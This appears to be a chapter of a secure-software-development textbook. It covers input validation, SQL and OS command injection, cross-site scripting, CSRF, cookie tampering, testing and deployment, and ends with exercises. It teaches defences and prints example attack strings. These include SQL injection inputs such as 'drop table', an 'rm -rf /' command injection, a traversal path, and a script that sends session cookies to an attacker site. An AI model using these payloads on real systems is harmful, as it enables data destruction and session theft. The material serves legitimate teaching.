Complete Mediation  Access rights are completely validated every time an access occurs [10, 19]. This means that each web transaction needs to be validated to ensure that the user was properly identified (an active authorization token) and that permission for the requested operation is authorized. Consider that file permissions may change during the time a file is open, that user accesses may have time limitations (e.g., first shift), or that a user abusing privileges may need to have permissions suddenly revoked. Complete mediation is a requirement of zero trust (see the Advanced Networks chapter).

Fail Secure Default  Security policy defines that a subject is given access to an object only when access is explicitly defined, and that authorized use of data and control is restricted by security mechanisms [10, 18]. However, what should happen when the security mechanisms fail: should a service fail open or fail closed when the service aborts? There are two possibilities:

• Fail Closed or Fail Secure: When a firewall aborts, no packets are allowed through. The alternative, fail open, would give access to unauthorized use.
• Fail Open or Fail Safe: A locked door opens during a fire. Here, loss of life is given priority over security.

Note that Fail Safe may mean Fail Closed [10].
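To make the fail secure default concrete, here is a minimal sketch in Java of a fail-closed permission check; PermissionStore and Permission are hypothetical application classes, not from any standard library:

    // Deny by default: access requires an explicit grant, and any failure
    // of the security mechanism itself results in denial (fail closed).
    static boolean isAuthorized(String userId, String resource) {
        try {
            Permission p = PermissionStore.lookup(userId, resource);  // hypothetical lookup
            return p != null && p.allows(resource);                   // explicit grant required
        } catch (Exception e) {
            return false;  // never fail open when the check itself breaks
        }
    }

The same deny-on-error shape supports complete mediation: because the check runs on every access, an exception in any single check denies only that access.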

21.2 Threats to Input

The Web enables hackers from around the world to attack software from the convenience of wherever the attacker happens to be. Figure 21.1 shows an example form, where the data is typed reasonably as string data and the numbers appear not to overflow, but the data is horribly fraudulent. The credit card number includes letters, the phone number is too short (and is an emergency number), the name and address are obviously nonsensical, and the amount paid is too low for a new car. However, social engineers have successfully carried out attacks like this, and if software validation is not good (or agents are too busy conversing with customers), then fraud like this may not be noticed.

Fig. 21.1  A car purchase form

Useful input validation techniques include allowlisting, which checks against a list of acceptable input, or blocklisting, which rejects suspect input [3]. An example in Fig. 21.1 is to ensure that the credit card number and most of the address are valid. When this is not possible, data should at least be correctly typed and the syntax should be checked. Java and other type-safe languages are safer than C/C++, which allow more flexibility in type conversions [3]. Additionally, input should adhere to business rules. For example, a new car price should be within a specific range. Simple business rules specify required and optional input data. The Audit chapter describes other input validation checks that can prevent this type of fraud. Input sanitization should occur using a bullet-proof standardized utility that has survived the test of time.

Attacks can occur at the raw input stage, such as buffer overflows and integer or floating point overflows [3]. In the case of buffer overflow, the user enters more characters than an input string buffer allows for, causing the buffer to spill over and affect nearby data. Worse yet, if the overflowing buffer is on the program stack, which could occur with local variables or method parameters, then the method's return address could be modified, enabling the attacker to jump to their chosen destination [3]. To counter this, it is important to use an input utility that enables programmers to (correctly) specify the maximum size of the buffer.

In the case of integer or floating point overflows, users enter numbers large or small enough to overflow or underflow the bounds of what a computer can store in a normal integer, float, double or other type [3]. This can cause (for example) large integers to appear small or become negative, and negative numbers to become positive. This occurs because computer integer arithmetic works in a modulo fashion, according to the number of bits allocated. Table 21.1 shows how calculations can overflow for char and int fields [13]. Calculated totals are thus subject to underflow and overflow. To counter this, use larger number types (e.g., long or long long) and verify that input and output numbers are within specified limits.

Table 21.1  Unexpected char and int operations

Data type      Operation                  Result
Signed char    127 + 1                    −128
Signed char    −128 − 1                   +127
Unsigned char  255 + 1                    0
Signed int     2,147,483,647 + 1          −2,147,483,648
Signed int     −2,147,483,648 − 1         +2,147,483,647
Unsigned int   4,294,967,295 + 1          0

For example, a total sale should not result in a negative number. Also, floating point numbers can overflow to 'infinity', although larger doubles overflow at larger number sizes.

Input from any source shall not be trusted, whether it comes from the keyboard, a data transmission, a file, an internal or external process, or an attached device. Any source may become hacked, affecting your code [15]. Any input from an external source should be suspect, including: parameters or arguments, cookies, network packets, environment variables, client request headers/data, query/server results, URL components, e-mail, files and databases [3].

Web attacks may include reading and modifying cookies and causing a victim server to store or execute attacks [12, 16]. In addition, client software can easily be modified, rewritten or spoofed to attack. Its cookies may be modified and web session IDs easily spoofed. If web sessions are maintained by the server, session IDs should time out and not be easily guessable [16]. Cookies should have the secure attribute set to ensure that any transmissions are encrypted via HTTPS. Since client input validation can easily be circumvented, it is important to sanitize input at the server [3]. Also, when coding with reusable modules, it is important to ensure that all data is checked between different code modules [15].

Good input validation must provide error messages. Error messages should be helpful to the user, but some messages can be too explicit. Chatty error messages tell an attacker about your configuration and internal software operations, e.g., "Cannot find file: C:/users/Lincke/validation.txt", "Invalid password for login ID", or "Lab.cs.uwp.edu error: divide by zero". Error messages should avoid file, network configuration and personal information [3]. Also, be sure to remove debug information before release.

Some vulnerabilities do not require an attack; instead, defects occur due to bad coding practices and mistakes. A race condition enables attackers to see data from other users or to cause a denial of service attack. A race condition arises when multiple threads simultaneously access shared data within the same process. Critical sections, implemented with semaphores or monitors, ensure safe access when shared data is required.
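As a minimal sketch of the overflow countermeasures above, the following Java method computes a sale total with exact arithmetic and a range check; the names quantity, unitPriceCents and MAX_SALE_CENTS are illustrative, not from the text:

    // Math.multiplyExact (Java 8+) throws ArithmeticException on overflow
    // instead of silently wrapping, as the values in Table 21.1 do.
    static final int MAX_SALE_CENTS = 20_000_000;  // assumed business limit

    static int saleTotal(int quantity, int unitPriceCents) {
        int total;
        try {
            total = Math.multiplyExact(quantity, unitPriceCents);
        } catch (ArithmeticException e) {
            throw new IllegalArgumentException("sale total overflows int");
        }
        // Business rule: a total sale must be positive and within range.
        if (total <= 0 || total > MAX_SALE_CENTS) {
            throw new IllegalArgumentException("sale total outside allowed range");
        }
        return total;
    }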


21.2.1 Recognize Injection Attacks

Data input may appear correct in length, type and syntax, but still be an attack. One example is the SQL or OS injection attack, where SQL or OS statements are appended to form input to attack a database [3]. Specifically, an SQL injection adds conditions or SQL commands as form input, modifying the program's intended command to enable the attacker to glean additional information or modify/delete the database. An OS command injection is similar, except that an OS command is appended to the form input; it is possible if the software enables OS access through the database interface. Alternatively, the attacker can add JavaScript code to the database, to be executed by other customers. An infected database can then spread an attack to other internal systems and possibly to anyone unfortunate enough to click on the website. These dangerous attacks are called cross-site scripting and cross-site request forgery, and are described in more detail in later sections. Some example SQL and injection attacks include:

Tautology SQL Attack: This attack forces a true condition in the programmed SQL statement [2]. An example attack could modify the following programmed SQL command in PHP code, where 'username' and 'password' are taken from POST web input:

$query = "SELECT * FROM users_table WHERE username='" . $_POST['username'] . "' AND password='" . $_POST['password'] . "'";

Then assume that the attack password entered was: Aa' OR 1 = 1 (input highlighted in bold below). The programmed SQL statement would then be executed with the second condition always true, meaning that the password would not need to match:

SELECT * FROM users_table WHERE username='anyname' AND password = 'Aa' OR 1 = 1;

Piggyback SQL Attack: In this SQL attack, the user appends a second SQL command as input (highlighted in bold) to alter the programmed SQL command, with the result below. This attack is dangerous in that it could remove an entire table. The semicolon separates the first and second commands, while the ending hyphen or -% indicates that anything that follows is a comment or otherwise terminates the command [2].

SELECT * FROM users_table WHERE username='anyname' AND password = 'foo; drop table users_table; -'

Union Queries: Query attacks may ask for additional data by appending a UNION SQL statement, such as in this Search query with highlighted input [2]:


SQL Result: SELECT * FROM cars WHERE description LIKE "%" UNION SELECT username, password FROM users; -%

Database Structure Queries: Attackers may glean information about the database structure by modifying SQL statements to divulge database metadata. In the first example below, the attacker will learn (with multiple tries) the length of the database name; when they find a match, all records will print. In the second example, the attacker can determine whether the first character of the database name is 'B'; if so, there will be a delay in printing [2].

SQL Result: SELECT name, description FROM cars WHERE description LIKE "%" AND LENGTH(database()) = 12; -%

SQL Result: SELECT * FROM users_table WHERE username= "%" AND (SELECT SLEEP(10) FROM DUAL WHERE SUBSTRING(database(),1,1)="B"); --" AND password = "%";

OS Command Injection: If web software enables a command to be executed at the shell level, then the command can be hijacked. Both C and PHP make available the system() procedure, which executes UNIX or Linux commands. An example PHP attack follows [4, 8]: $userName = $_POST["user"];$command $userName;system($command);

=

'ls

-l

/home/’

.

If the input appends another command, such as remove files recursively (; rm -rf /), then, when permissions allow, the entire drive (/) could be deleted.

URL Injection Attack: NoSQL, LDAP, URL, XML parsers, SMTP headers, other expression languages, and object mapping queries may be similarly attacked. In this URL example, a conditional is attacked, as shown here [5]:

http://example.com/app/accountView?id=' or '1'='1'

The defense for these types of attacks is to control input. It is recommended to use a safe application programming interface (API) or Object Relational Mapping tool, which will parameterize the interface and remove meta-characters from input. Standard tried-and-true utilities can help to prevent attacks. OWASP is an organization dedicated to free, open source, secure application code. OWASP's Enterprise Security Applications Programmer Interface (ESAPI) includes an example validation API that defends against coded attacks. If possible, it is recommended to avoid user-supplied inserted text or dynamically-constructed query strings, and instead use positive input validation at the server (forcing input to a set of acceptable values).


If an attack does succeed, a LIMIT SQL command will control the number of exposed records. Finally, any commands that allow execution by the operating system should be avoided in coding.
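As a minimal sketch of such a parameterized interface, the following Java JDBC code binds input as data rather than concatenating it into the command, so a tautology input such as Aa' OR 1 = 1 cannot change the SQL; the table and column names follow the earlier examples:

    import java.sql.Connection;
    import java.sql.PreparedStatement;
    import java.sql.ResultSet;
    import java.sql.SQLException;

    // The driver sends the SQL text and the values separately, so SQL
    // metacharacters in user input cannot alter the command structure.
    static boolean loginExists(Connection conn, String username, String passwordHash)
            throws SQLException {
        String sql = "SELECT 1 FROM users_table WHERE username = ? AND password = ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setString(1, username);      // bound as data, never concatenated
            ps.setString(2, passwordHash);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next();
            }
        }
    }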

21.2.2 Control Cross-Site Scripting (XSS)

Cross-site scripting is a common web attack in which an attacker provides data that will be executed in other users' browsers. This can occur when an attacker injects data with embedded executable scripts into forms, and those scripts are later served to and executed by other visitors [17]. For the attack to succeed, form input is not validated at the server. In the following code snippet (the OWASP example cited [5]), the 'CC' parameter is requested and inserted into the HTML page; instead of the required credit card input, an attack script is supplied, which sends a copy of the session cookie to the attacker's website, enabling the attacker to hijack the session [5]:

    (String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";

The attacker submits, in place of the credit card number:

    '><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'

To defend, it is possible to verify data type, length, syntax, and business rules for all input, but positive checks are preferred. It is also important to keep any libraries patched, such as XML or SOAP utilities [7].

To ensure that a website is not infected with XSS attacks, it is possible to validate output in addition to input. It then is necessary to specify strong character encoding on output, such as UTF-8 or ISO-8859. (These are standardized character sets; UTF-8 is an abbreviation for Unicode Transformation Format using 8 bits.) Once output can be properly validated, it is possible to use a same-origin policy. This policy requires that all components of a web page use the same protocol and port number, and be derived from the same host. If we compare the two URLs http://www.organization.com/directory1 and https://organization.sales.com:85/directory3, we see they differ in protocol (http versus https), in port number (default 80 versus 85) and in host (www.organization.com versus organization.sales.com). Any single difference violates the same-origin policy [3].
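A minimal sketch of that origin comparison in Java follows, using java.net.URI; it assumes absolute http(s) URLs, and the default-port substitution (80/443) is an assumption about typical web configurations:

    import java.net.URI;

    // Two URLs share an origin only if scheme, host, and effective port all match.
    static boolean sameOrigin(String a, String b) {
        URI u = URI.create(a);
        URI v = URI.create(b);
        return u.getScheme().equalsIgnoreCase(v.getScheme())
                && u.getHost().equalsIgnoreCase(v.getHost())
                && effectivePort(u) == effectivePort(v);
    }

    // Substitute the protocol default when no explicit port is given.
    static int effectivePort(URI u) {
        if (u.getPort() != -1) return u.getPort();
        return "https".equalsIgnoreCase(u.getScheme()) ? 443 : 80;
    }

With this check, the two example URLs above fail on all three components.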

21.2.3 Authentication and Access Control

This section first discusses attacks related to authentication (login-password), then access control (permissions). The password-guessing techniques described in other chapters apply to application software too: default or socially engineered passwords, dictionary attacks, brute force attacks, and easily copied and broken password files. The best solutions to these problems include limiting failed login attempts or providing increasing delays with each failure, and storing passwords with a strong hash/salt algorithm [5]. While best practices have recommended complex passwords, changed frequently, most recommendations (including NIST's) now advise that multifactor authentication ranks as more important than password complexity and changes.

Techniques used to access accounts, other than password guessing, include reading passwords transmitted without encryption, or accessing a public computer with a previously logged-in account. These two methods must be countered with encrypted transmissions and idle time lockouts [5].

Changing packet contents and packet replay fall within the class of broken authentication algorithms. JavaScript tests sent to a client may be modified or not executed. JavaScript sent back to the server may likewise be changed. Figure 21.4 shows that code can be reverse engineered to learn how data is processed, then changed inappropriately. Figure 21.5 shows how a URL which includes an account number can simply be changed to obtain access to new accounts. To prevent guessing of account numbers and credentials, it is important to use random session numbers (not repeated or sequential), which are not listed in URLs and are closed at the end of the connection or after an idle timeout. In addition, strong input validation techniques include positive checks or allowlisting, strong typing, using primitive data types in serialization, and enforcing business rules [5]. It is particularly important to validate input at the server, since the client may be corrupted.

Another form of changing packet contents is the object serialization error, where formatted data fields are changed before transmission [5]. This affects Remote Procedure Call (RPC), authentication tokens, cookies, and HTML forms. In the following example, PHP object serialization is used to save a "super" cookie, holding the user's ID, role (user), and authentication credential (password hash) as:


a:4:{i:0;i:132;i:1;s:6:"Andrea";i:2;s:4:"user";i:3;s:32:"f8a93e098acd823e2d1ac334285fef32";}

An attacker may change the serialized object to give another person admin privileges:

a:4:{i:0;i:1;i:1;s:5:"Alice";i:2;s:5:"admin";i:3;s:32:"f8a93e098acd823e2d1ac334285fef32";}

To defend against object serialization or replay attacks, it is recommended to encrypt all cookies and transmissions, use integrity checks to detect changes, include a nonce, and log all failures. Encryption makes modifying a packet difficult, but does not prevent an attacker from trying changes. Integrity checks ensure that packets have not been modified, but cannot defend against replay. The defense against replay is the nonce, an active authorization ticket. The nonce is a security passcode or permission tag that limits the maximum time the user has to respond. For example, a nonce may be implemented as a sequence number that increases with each transmitted packet in a connection.

CAPTCHA is an example of a nonce used for session authentication (e.g., select all bridges from these 9 photos). CAPTCHA discourages automated attacks by using tests to ensure web requests come from humans. It is used for public access when no login accounts exist; it is not required when a login-password or multifactor authentication is used.

Other safeguard rules include that sensitive data must be configured not to be retained in web caches, and that hidden webpages are not truly hidden. It may be tempting to use a hidden webpage (with no obvious links), thinking that may prevent unauthorized access. However, remember that protocol sniffing is used to monitor web accesses, which can easily be replayed. It is also recommended to disable web server directory listings, e.g., for RPC or Java RMI, where possible. Finally, all errors and potential attacks should be logged. Software developers can learn from attacks, and administrators can monitor and defend against them. A common and attractive form of object serialization attack is cross-site request forgery.
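As a minimal sketch of such an integrity check, the following Java code appends an HMAC-SHA256 tag to a cookie value using the standard javax.crypto API; server-side key management is assumed to exist. Note that this detects modification, such as the admin-role edit above, but a nonce is still needed to defend against replay:

    import javax.crypto.Mac;
    import javax.crypto.spec.SecretKeySpec;
    import java.nio.charset.StandardCharsets;
    import java.util.Base64;

    // The server recomputes the tag on every request and compares it, so
    // any client-side edit of the value invalidates the cookie.
    static String signCookie(String value, byte[] serverKey) throws Exception {
        Mac mac = Mac.getInstance("HmacSHA256");
        mac.init(new SecretKeySpec(serverKey, "HmacSHA256"));
        byte[] tag = mac.doFinal(value.getBytes(StandardCharsets.UTF_8));
        return value + "." + Base64.getUrlEncoder().withoutPadding().encodeToString(tag);
    }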

21.2.4 Recognize Cross-Site Request Forgery (CSRF)

Cross-site request forgery occurs when a server provides an authentication token to a user, and an attacker copies that authentication token and uses it for similar or other purposes [16]. (See Fig. 21.6.) When an authentication token is pre-approved, an attacker can delete another user's account, change user data, and/or update their privileges to administrator [4]. The root cause of this problem is the pre-approved nature of the authentication token, which instead should be validated on a per-input basis.


Fig. 21.6  Cross-site request forgery

Complete mediation ensures that every request to an operating system or server is verified for authorization, regardless of the number of repeated accesses [11]. Mechanisms required to implement an active authorization token include using a nonce to prevent replay, and using pseudorandom identifiers within a cookie for each request. These can be accomplished using an anti-CSRF package, such as OWASP CSRFGuard or the ESAPI Session Management control, and by testing for CSRF (e.g., using OWASP CSRFTester) [4]. Finally, for dangerous requests, it is useful to send a separate confirmation form.
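A minimal sketch of a per-session anti-CSRF token follows, assuming the Java servlet API; production code would normally rely on a vetted package such as those named above:

    import java.security.MessageDigest;
    import java.security.SecureRandom;
    import java.util.Base64;
    import javax.servlet.http.HttpSession;

    // Issue a CSPRNG token, store it in the session, and embed it in each form.
    static String issueCsrfToken(HttpSession session) {
        byte[] raw = new byte[32];
        new SecureRandom().nextBytes(raw);
        String token = Base64.getUrlEncoder().withoutPadding().encodeToString(raw);
        session.setAttribute("csrfToken", token);
        return token;
    }

    // On every state-changing request, compare submitted and stored tokens
    // with a constant-time comparison; reject (fail closed) on any mismatch.
    static boolean csrfTokenValid(HttpSession session, String submitted) {
        String stored = (String) session.getAttribute("csrfToken");
        if (stored == null || submitted == null) return false;
        return MessageDigest.isEqual(stored.getBytes(), submitted.getBytes());
    }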

21.2.5 Minimize Access

If an attacker successfully gains entry, it helps to restrain what they can do and have access to. Therefore, limit access to privileges, resources and the operating system, according to the authorization goal of least privilege. When privileges are needed, raise them, but lower them as soon as possible thereafter. Here are some important considerations [3]:

• Permissions: Use authorization levels and access control to minimize permissions at all times, whether anonymous, normal, privileged or administrative, and also based on role (e.g., role-based access control). Only provide higher-level access when you need it.
• Resources: Keep resources such as files, devices, and communications open for the smallest period possible. When done using a resource, close it! Do not keep unnecessary resources busy or leave files open to attack.
• Jail: The operating system can impose resource limits on programs, including I/O bandwidth, disk quotas, network access restrictions and a restricted file system namespace. A popular application of resource limitation is rate limiting, which limits the number of transactions that can occur in a specific period (e.g., preventing breaches); see the sketch after this list.
• Caching: Web caches can be saved in the network or in a computer, reducing transmissions across the network for identical data; for sensitive data, this must be prevented. Sensitive web pages should never be cached and must have an active authorization token.
• Credentials: Never hardcode a login/password credential, in case the login/password is discovered by attackers.
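As a minimal sketch of rate limiting, the following Java class allows at most a fixed number of requests per client key per one-minute window; this fixed-window design is an illustrative simplification of the token-bucket or sliding-window limiters used in production:

    import java.util.concurrent.ConcurrentHashMap;
    import java.util.concurrent.atomic.AtomicInteger;

    class RateLimiter {
        private final int maxPerMinute;
        private final ConcurrentHashMap<String, AtomicInteger> counts = new ConcurrentHashMap<>();
        private volatile long windowStart = System.currentTimeMillis();

        RateLimiter(int maxPerMinute) { this.maxPerMinute = maxPerMinute; }

        // Returns false once a client exceeds its budget for the current window.
        boolean allow(String clientKey) {
            long now = System.currentTimeMillis();
            if (now - windowStart > 60_000) {   // start a new one-minute window
                counts.clear();
                windowStart = now;
            }
            return counts.computeIfAbsent(clientKey, k -> new AtomicInteger())
                         .incrementAndGet() <= maxPerMinute;
        }
    }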

21.3 Implement Security Features

We have already described the necessity of confidentiality and integrity in authentication, but they are also necessary for all sensitive data. In addition, logging is crucial to recognize and record attacks and sensitive transactions. Finally, there are a series of safe coding practices. The best way to ensure compliance is to have a documented coding standard and to ensure everyone is trained in using the coding standard, as well as secure utilities and processes. Developing secure software requires using secure software methods.

Data must first be evaluated to rate its sensitivity and criticality class. There must be a sincere business need to obtain and retain data. After deciding to retain and classify data, the data must be protected. Encryption and integrity (hashing) tools or protocols should use standardized high-security algorithms, for both storage and transmission of sensitive data. Integrity hashes protect file transfers of code and data files from attacks like DNS spoofing or cache poisoning, where file contents could be changed [3]. Session key generation must rely upon a good random number generator to create random session keys; if keys are not random, attackers will figure out the next key sequence. Encryption should be used end-to-end, such that everywhere the data is transmitted or stored, the data is safely encrypted.

Logs used for audit purposes (as opposed to debug) should include [17]: identity (e.g., username or email, and IP address); UTC time and date; and event code, description and outcome. Important events to log include user authentication/authorization, changes to security or logging configuration, and logging maintenance activities.

Instead of writing security utilities, an Open Design builds on software created and shared by multiple users that has withstood the test of time. This often-public software survives based on the strength of the security algorithm and the correctness of its implementation [11]. Secure software utilities include input sanitization software, ciphers, integrity, authentication, authorization, session management, logging, and good random number generators [3]. Use a development framework that provides solid and standard utilities for these operations. However, even tried-and-true open source software can get out of date or can encounter injected attacks.


An organization is responsible for its code: use due care and due diligence to analyze and test these tools well. Any third-party software should be carefully downloaded only from reputable (preferably signed) sites and evaluated against internal standards (such as recent encryption algorithms) [5]. After adopting third-party software, it is important to disable unnecessary features, remove excessive files and code, and configure it properly for security, in order to prevent unapproved use by attackers. After release, it is important to regularly monitor for vulnerabilities related to that software, and patch as necessary.

In addition to security features, it is useful for programmers to follow some lower-level programming rules, such as those listed below.

Never Expose Internal Data Structures  Web programmers may send information within forms or encoded URLs to help servers process them once these transactions are submitted back. This information may consist of internal coding data in the form of database keys, object references or IDs, or file references. An attacker can manipulate this information within forms to directly access other records or resources [16]. To prevent attacks on integrity, perform all transaction translations at the server, and/or use strong encryption to cipher internal information.

Manage Exceptions  Reliable code does not fail easily. Problems may occur due to operational failures of hardware, software components or networks, or due to permission failures or revocations, policy failures, and context invalidations, among other causes [14]. When an exception occurs, the programmer can abort, continue or commit (complete) the operation. From the user perspective, recovery is preferable and may be required for a mission-critical function. Exceptions are preferably recovered at lower, action-oriented levels, where the specific condition is known. If not, exceptions can be handled at a higher operational level. While automatic exception handling is preferred, a means of manual intervention may be required for mission-critical code. The proper functionality during failure is best decided during the Requirements and Analysis stages.

Use Static Analysis Tools  Static analysis inspects the code without executing it [19]. This can occur via code inspections and/or automated tools. Automated static analysis tools provide warnings beyond what a compiler normally provides. Alternatively, some compilers have security-related options that can notify you of security vulnerabilities [3]. It is recommended to fix all warnings. These analysis tools, for example, point out variable or environment contents that may not be initialized, thereby potentially leaking previous data to unrelated users. NIST offers a Source Code Security Analyzers evaluation sheet that lists code analysis products, their features, the programming languages they support, the most recent update date, and whether the tool is free or part of a larger package. This evaluation sheet can be found at: http://samate.nist.gov/index.php/Source_Code_Security_Analyzers.html.
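Returning to the audit-log fields listed earlier in this section, a minimal sketch using Java's standard java.util.logging follows; the field names and event code are illustrative, not from the text:

    import java.time.Instant;
    import java.util.logging.Logger;

    static final Logger AUDIT = Logger.getLogger("audit");

    // One audit record with the suggested fields: identity, UTC time and date,
    // event code, description, and outcome.
    static void auditLogin(String username, String clientIp, boolean success) {
        AUDIT.info(String.format("user=%s ip=%s time=%s event=%s desc=%s outcome=%s",
                username, clientIp, Instant.now(),   // Instant renders in UTC
                "AUTH_LOGIN", "interactive login", success ? "SUCCESS" : "FAILURE"));
    }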


21.4 Testing Issues

Preparing test cases is important for ensuring that attacks have been remediated before code is released. Tests should be automated, but before automating them, it is important for tests to be carefully written and reviewed. A test plan holds a number of test cases, where each test case tests for a particular set of features. Table 21.2 demonstrates a sample test case for a Create Patient Information form. Test cases should specify detailed input and output (e.g., specific SQL attacks or business rule violations), which is not shown in the example below.

Table 21.2  Sample test case

Test case: create patient information
Test case ID: 3
Test purpose:
 1. Ensure a valid new client can be entered into the system, and the appropriate tabs are created.
 2. Ensure a duplicate entry is not created for an existing patient.
 3. Ensure invalid data is detected, including wrong data types, overflow text, overflow math numbers, blank required fields, and inappropriate data.
 4. Ensure logs are created for attacks, including overflow, business rule violations and SQL errors or injection.
 5. Ensure an encrypted transaction log is created documenting the transaction, and the author and time of the transaction.
Preconditions: The tester is logged in at the main menu.
Flow of events:
 1. The tester selects "Manage Patient" or as an extension to make an appointment.
 2. The tester enters last and first name for an existing patient and presses 'Create'.
 3. While the system finds a matching record:
  1. The system should display an error message, "Match Exists", and request the tester revise the information.
  2. The tester changes the name to a new patient name.
 4. The system should display multiple tabs, including Patient Information (Form 6.2), Patient Medical History (Form 6.3), and Patient Medical Information (Form 6.4).
 5. The system should rename the 'Create' button into the 'Save' button.
 6. The tester enters inappropriate data types according to business rules for each field of the new Patient data and presses 'Save'.
 7. The system should recognize the invalid information and give error messages.
 8. The tester enters too much information for text strings, or overflow data for arithmetic fields, for each field of the new Patient and presses 'Save'.
 9. The system should recognize the overflow, provide error messages, remain on the same page, and log the error(s).
 10. The tester leaves required fields empty for the new patient and presses 'Save'.
 11. The system should recognize the lacking information and give error messages.
 12. The tester enters inappropriate information (violating business rules) for controlled fields of the new patient and presses 'Save' (e.g., illegal state, sex, number of children > 10, illegal insurance, etc.)
(continued)


Table 21.2 (continued)
 13. The system should recognize the errors and give error messages.
 14. The tester enters an SQL injection attack into many fields.
 15. The system should recognize the attack, indicate an error, and log the specific command executed.
 16. The tester enters valid information for the new patient and presses 'Save'.
 17. The system assigns the patient a patient number and displays: 'Record Updated'.
 18. The system should create a Patient Plan Management (Form 6.5) tab for Patients with health plans, or a Patient Bill Management tab for Patients without.
 19. The tester confirms the creation of the new tabs and that a new encrypted transaction log saved the new patient record, including who saved the transaction and when.
 20. The tester confirms that SQL injection attacks and business rule violations are logged.
Business rules:
 1. Name must include alphabetic characters.
 2. State must be legal and zip code must be a legal zip code for the state.
 3. Phone number must be 10+ numeric digits.
 4. Insurance must be one of a set of accepted insurance companies, or specify 'no insurance'.
 5. Birth year must be between 1900 and the current year; birth month and day must be valid.
 6. Required fields include all fields except email, secondary phone, and, if 'no insurance' is selected, insurance information.
Postconditions:
 1. The new record has been saved into the test database.
 2. For patients with health plans, a Patient Plan Management tab is available with information about the Patient's plan. For patients without, a Patient Bill Management tab is provided.
 3. Logs exist for attack conditions: SQL attacks and violation of business rules.
 4. An encrypted transaction log includes the new records, including who performed the transaction and when.

Notice that the Flow of Events lines start with "The system…" or "The tester…", ensuring that the test plan is unambiguous as to who does what. Also, the test case should be specific to the software being produced, and not to the router or OS (unless that is what is being tested). Test cases are introduced in this chapter because they are a good way to test for software attacks and vulnerabilities. Testing is a larger topic and will be covered more extensively in the next chapter on Software Processes.

21.5 Deployment Issues

Two main deployment issues are secure installation and maintenance. Even after software is deployed, the system must be supported via patching.


21.5.1 Validate and Control the Configuration

Programs often require additional files to run properly, such as configuration or environmental files. If these files are accessible to an attacker, they can be changed, which can cause a program to operate in an unintended way. These files should be stored in a location that prevents access by users. Consider two scenarios:

• A program is on a client computer, accessing files on the client computer;
• A web program accesses files that are unintentionally publicly accessible (via URL).

Trying to hide publicly accessible files on a server is not secure. Directory traversal is an attack where a URL is coded to access unexpected files or commands on the web server, such as www.company.com/../../cmd [3]. In each of these cases, characters may be encoded to hide their contents: %2e%2e%2f. To ensure that critical environmental files are properly stored in a secure location, programmers should use the full pathname to access the file, then validate that the file does indeed have the required minimal access permissions; see the sketch below. These are good defenses to ensure an administrator has installed the files properly. If instead "security.dat" is specified as the pathname, indicating the file is in the current directory, this file can be replaced when the executable is run from another location. Also, there must be clear installation documentation that describes the specific paths where files are stored, and these directories shall have restricted access [3]. Finally, remember the important concept of fail secure: when a configuration error is detected, it is important to fail secure or fail closed.

It may be tempting to avoid a configuration file and hardcode all necessary configuration in code. First, assume that the attacker can and will reverse engineer code and can easily learn all hard-coded secrets [3]. Second, this is a particularly bad idea when specifying a password: if an attacker finds it, every system can be broken into before software can be changed on all computers [3]. Instead, passwords should be stored in an encrypted file.
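A minimal sketch of the full-path and permission validation above, using Java NIO, follows; the path /etc/myapp/security.dat is illustrative, and the permission check applies on POSIX file systems:

    import java.io.IOException;
    import java.nio.file.Files;
    import java.nio.file.Path;
    import java.nio.file.Paths;
    import java.nio.file.attribute.PosixFilePermission;
    import java.util.Set;

    // Resolve the configuration file by full pathname and refuse to run if
    // it is group- or world-writable; any error also aborts (fail closed).
    static void checkConfigPermissions() throws IOException {
        Path cfg = Paths.get("/etc/myapp/security.dat");  // full path, never "security.dat"
        Set<PosixFilePermission> perms = Files.getPosixFilePermissions(cfg);
        if (perms.contains(PosixFilePermission.GROUP_WRITE)
                || perms.contains(PosixFilePermission.OTHERS_WRITE)) {
            throw new SecurityException("config " + cfg + " is writable by others; aborting");
        }
    }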

21.5.2 Questions and Problems

1. Vocabulary. Match each meaning with the correct word: Jail, Test case, Nonce, Fail open, Test plan, Static analysis, Rate limiting, Least privilege, Encryption, SQL injection, Directory traversal, Fail closed, Integrity hashing, Cross-site scripting, Cross-site request forgery, Complete mediation, Attack surface analysis.


(a) An operating system imposes resource limits on a program, to limit I/O, disk and network resource consumption.
(b) A tool which inspects code for flaws, without executing the code.
(c) This attack modifies programmed database commands to include additional conditions or commands, with potential results of changing the database, gaining permissions, or divulging database information.
(d) This attack inserts unauthorized scripts into databases that may infect visitors to the web server.
(e) An analysis technique that considers all aspects of software exposure to determine potential vulnerabilities.
(f) This attack copies an authorization ticket for reuse, replay, or to enhance privileges.
(g) This attack searches for accessible web directories and files unintentionally exposed.
(h) An authorization token that defends against replay.
(i) This table describes the purposes of a test and the steps a tester should take to execute the test.
(j) This control defends against transmitted packets being modified.
(k) A method that limits the rate of transactions processed, and can prevent major breaches.
(l) An alternate name for fail secure.
(m) An alternate name for fail safe.
(n) Access rights are completely validated every time an access occurs.
(o) Persons should have permissions to do the primary functions of their job duties and no more.
2. Web Research. Mitre provides a list of Common Weakness Enumerations at their site: https://cwe.mitre.org/index.html. There may be a common description for a set of CWE scenarios, which you can follow down to a detailed level. Select a Software Development CWE that interests you, and answer the following questions about it:
(a) What is its CWE number and name?
(b) Describe the basic attack or vulnerability.
(c) Describe an example of how the vulnerability occurs.
(d) Describe some mitigations to prevent or reduce the attack's effects.
3. Static Analysis Tools. NIST offers a Source Code Security Analyzers evaluation sheet that lists code analysis products and their features. Select a language you commonly program in, and determine which tools are available for that programming language and what features each supports. This evaluation sheet can be found at: http://samate.nist.gov/index.php/Source_Code_Security_Analyzers.html.
4. Ladder Diagrams. Many figures in this chapter have shown transmissions between a client, server, and attacker, in order to demonstrate how an attack occurs. Develop ladder diagrams to show how the following attacks occur:


(a) Phish attack resulting in a download and use of a backdoor.
(b) Password guessing attack, resulting in a successful access.
The ladder diagram can be drawn as a UML Sequence Diagram or with a regular word processor.
5. Development Framework Evaluation. Evaluate your programming framework to determine which utilities are available to implement security features such as: input sanitization, encryption, integrity (hashing), authentication/authorization and logging. Indicate which security-related classes exist and document the key methods that may be useful in using these utilities. List the signatures and features of the available basic methods.
6. Find Security Bugs. Evaluate the following sets of pseudo-code for security problems. What problems do you see, and what fixes would you recommend?

Security() {
    String contents, environment;
    String spath = "config.dat";
    File config = new File();
    if (config.open(spath) > 0) {
        contents = config.read();
        environment = config.read();
    }
    else
        print("Error: config.dat not found");
}

purchaseProduct() {
